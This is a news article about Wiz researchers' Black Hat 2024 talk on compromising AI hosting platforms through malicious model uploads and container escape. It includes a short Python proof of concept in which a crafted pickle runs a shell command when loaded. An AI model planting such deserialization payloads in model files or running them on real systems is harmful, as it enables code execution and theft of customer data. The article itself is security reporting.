Wiz researchers hacked into leading AI infrastructure providers

During Black Hat USA 2024, Wiz researchers discussed how they were able to infiltrate leading AI service providers and access confidential data and models across the platforms.

LAS VEGAS -- Wiz researchers warned that AI infrastructure providers like Hugging Face and Replicate are susceptible to novel attacks and must improve their defenses to protect sensitive user data.

During Black Hat USA 2024 on Wednesday, Wiz security researchers Hillai Ben-Sasson and Sagi Tzadik led a session that expanded on year-long research they conducted into three of the major AI infrastructure providers: Hugging Face, Replicate and SAP AI Core. The researchers tested whether they could break into the leading AI platforms and studied how easy it would be for attackers to gain access to confidential data.

The goal of the research was to assess the security of these platforms and determine the potential risks of storing valuable data in one of the top three AI platforms. As new AI technology has taken off, cybercriminals and nation-state actors alike have targeted third-party providers and platforms that host sensitive data and training models.

Hugging Face, a machine learning platform where users build models and host data sets, was itself recently attacked. In June, the company detected suspicious activity on its Spaces platform and reset keys and tokens in response.

During the session, the researchers showed how they compromised the platforms by uploading malicious models and using container escape techniques to break out of their tenant and move laterally across the service. In an April blog post, Wiz researchers described how they were able to compromise Hugging Face and gain cross-tenant access to other customers' data and training models. The cloud security vendor later published research on similar issues with Replicate and SAP AI Core, and they demonstrated the attack techniques during Wednesday's session.
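
That initial foothold relied on unsafe model deserialization: Wiz's write-up described uploading a pickle-based PyTorch model crafted to run code when loaded. The minimal sketch below, using plain pickle and a hypothetical payload rather than a real model file, shows why simply loading such an upload is enough:

```python
import os
import pickle

# Pickle is a program, not just data: unpickling calls __reduce__, which
# returns a callable plus arguments for the loader to invoke.
class MaliciousModel:
    def __reduce__(self):
        # Hypothetical payload; a real attacker would launch a reverse shell.
        return (os.system, ("id",))

payload = pickle.dumps(MaliciousModel())

# What an inference platform effectively does when it loads the upload:
pickle.loads(payload)  # runs "id" inside the serving container
```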

Prior to Black Hat, Ben-Sasson, Tzadik and Ami Luttwak, CTO and co-founder of Wiz, spoke with TechTarget Editorial about the session and lessons learned from the research. In all three cases, the researchers were able to break into the platform and access sensitive customer data.

"We accessed millions of confidential AI artifacts like models, data sets, code -- unique intellectual property that can go for millions of dollars," Ben-Sasson said.

Luttwak said many AI service providers use containers as barriers between different customers. But he stressed that those containers can be bypassed in many ways. For example, Luttwak said container services are prone to misconfigurations.

"There are all sorts of vulnerabilities that come out that will allow people to bypass these barriers. We think that containerization is not a secure enough barrier between tenants or tenant isolation," Luttwak said.

Once the researchers discovered they could hack the platforms, they reported the issues to each service provider. Ben-Sasson applauded Hugging Face, Replicate and SAP for their disclosure responses. He said the companies were collaborative and professional, and Wiz researchers worked closely with their respective security teams to resolve the issues.

While the vulnerabilities and weaknesses were addressed by the providers, Wiz researchers recommended that organizations adapt their threat models accordingly to account for potential data compromises. As for the platforms, the researchers urged the AI service providers to improve their isolation and sandboxing standards to prevent threat actors from jumping to other tenants and moving laterally within the platforms.

Rapid AI adoption and risks

Beyond urging the three platforms to strengthen defenses such as sandboxing and isolation standards, the researchers discussed broader problems created by AI's rapid adoption. They stressed that security is an afterthought when it comes to AI.

"AI security is also infrastructure security because AI is very trendy and very new, and not a lot of people understand what AI security actually is," Luttwak said.

Luttwak added that organizations testing AI models often get security wrong because their security teams don't understand all the infrastructure pieces involved, which can span dozens or even hundreds of unfamiliar tools, each introducing new security problems. It's a huge challenge for security teams because everyone wants to use AI, he emphasized, so teams adopt whatever resources they can, including open-source tools, while security becomes a secondary concern.

"These tools are not built with security and that means it puts every company at risk," Luttwak said. "It's just about making sure that when you use models [and] when you use open-source tools that are related to AI, [you] do due diligence security validation for them. If we can prove it on the AI service provider companies where it's their main business, you can imagine a company that's not even that big."

During another Black Hat session on Wednesday, Chris Wysopal, CTO and co-founder at Veracode, discussed how developers are increasingly using large language models for coding but often putting security second. He listed several concerns, including data set poisoning and generative AI tools replicating existing vulnerabilities.

Arielle Waldman is a Boston-based reporter covering enterprise security news.
